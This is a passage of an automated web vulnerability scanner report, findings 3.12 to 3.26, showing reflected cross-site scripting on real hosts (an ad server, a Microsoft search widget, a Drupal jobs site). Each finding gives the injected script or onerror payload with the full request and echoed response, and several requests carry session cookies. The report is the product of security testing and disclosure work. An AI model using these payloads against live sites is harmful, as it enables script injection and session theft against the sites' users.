3.12. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload aabb5><script>alert(1)</script>bdb618d8812 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=aabb5><script>alert(1)</script>bdb618d8812 HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 270

<html><body><base target=aabb5><script>alert(1)</script>bdb618d8812><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0/170/ADTECH;target=aabb5><s
...[SNIP]...

3.13. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3109b"><script>alert(1)</script>3efc1e6b184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe3109b"><script>alert(1)</script>3efc1e6b184/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn3109b"><script>alert(1)</script>3efc1e6b184/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.14. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a297"><script>alert(1)</script>e672ef11e74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.05a297"><script>alert(1)</script>e672ef11e74/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.05a297"><script>alert(1)</script>e672ef11e74/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.15. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 675dd"><script>alert(1)</script>1f1c87414ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205675dd"><script>alert(1)</script>1f1c87414ca/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205675dd"><script>alert(1)</script>1f1c87414ca/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.16. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15372"><script>alert(1)</script>519552992e4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/178596015372"><script>alert(1)</script>519552992e4/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/178596015372"><script>alert(1)</script>519552992e4/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.17. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4983"><script>alert(1)</script>a5233a774cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0a4983"><script>alert(1)</script>a5233a774cb/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0a4983"><script>alert(1)</script>a5233a774cb/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.18. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56715"><script>alert(1)</script>1b3cc5afd7e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0/22556715"><script>alert(1)</script>1b3cc5afd7e/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0/22556715"><script>alert(1)</script>1b3cc5afd7e/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.19. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2215b"><script>alert(1)</script>9c7a1b47bba was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0/225/ADTECH2215b"><script>alert(1)</script>9c7a1b47bba;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0/225/ADTECH2215b"><script>alert(1)</script>9c7a1b47bba;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group];adiframe=y">
...[SNIP]...

3.20. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec250"><script>alert(1)</script>e520c05f978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]&ec250"><script>alert(1)</script>e520c05f978=1 HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 374

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]&ec250"><script>alert(1)</script>e520c05f978=1;adiframe=y">
...[SNIP]...

3.21. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b937a><script>alert(1)</script>900b161fd17 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=b937a><script>alert(1)</script>900b161fd17 HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 270

<html><body><base target=b937a><script>alert(1)</script>900b161fd17><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0/225/ADTECH;target=b937a><s
...[SNIP]...

3.22. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785960/0/225/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24df1"><script>alert(1)</script>1376414e666 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]24df1"><script>alert(1)</script>1376414e666 HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 371

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]24df1"><script>alert(1)</script>1376414e666;adiframe=y">
...[SNIP]...

3.23. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i2.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6945e<img%20src%3da%20onerror%3dalert(1)>d02588c1036 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6945e<img src=a onerror=alert(1)>d02588c1036 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&6945e<img%20src%3da%20onerror%3dalert(1)>d02588c1036=1 HTTP/1.1
Host: i2.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/security/cc308589
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/19/2011 11:25:31&Microsoft.VisitStartDate=04/19/2011 11:23:33&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=4&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303495946458:ss=1303495946458

Response

HTTP/1.1 200 OK
ntCoent-Length: 12915
Content-Type: application/x-javascript
ETag: a5cf5e2c5d91dc93e7ed574c10557cf5
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB32
Cache-Control: public, max-age=43200
Expires: Sat, 23 Apr 2011 09:13:04 GMT
Date: Fri, 22 Apr 2011 21:13:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 12915


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&6945e<img src=a onerror=alert(1)>d02588c1036=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.24. http://jobs.ctg.eu/N [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /N

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d636"><img%20src%3da%20onerror%3dalert(1)>cd559f46f5d was submitted in the REST URL parameter 1. This input was echoed as 4d636"><img src=a onerror=alert(1)>cd559f46f5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /N4d636"><img%20src%3da%20onerror%3dalert(1)>cd559f46f5d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:13:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=b257485ec059ff6942c32478304dbbe9; expires=Sun, 15-May-2011 20:46:44 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:13:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="N4d636"><img src=a onerror=alert(1)>cd559f46f5d not-front not-logged-in page-n4d636img-srca-onerroralert1cd559f46f5d no-sidebars">
...[SNIP]...

3.25. http://jobs.ctg.eu/jobs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /jobs/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2936"><img%20src%3da%20onerror%3dalert(1)>c561c14c380 was submitted in the REST URL parameter 1. This input was echoed as a2936"><img src=a onerror=alert(1)>c561c14c380 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /jobsa2936"><img%20src%3da%20onerror%3dalert(1)>c561c14c380/ HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:50:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:50:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="jobsa2936"><img src=a onerror=alert(1)>c561c14c380 not-front not-logged-in page-jobsa2936img-srca-onerroralert1c561c14c380 no-sidebars">
...[SNIP]...

3.26. http://jobs.ctg.eu/misc/drupal.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db47"><img%20src%3da%20onerror%3dalert(1)>44ae54b8308 was submitted in the REST URL parameter 1. This input was echoed as 6db47"><img src=a onerror=alert(1)>44ae54b8308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /misc6db47"><img%20src%3da%20onerror%3dalert(1)>44ae54b8308/drupal.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
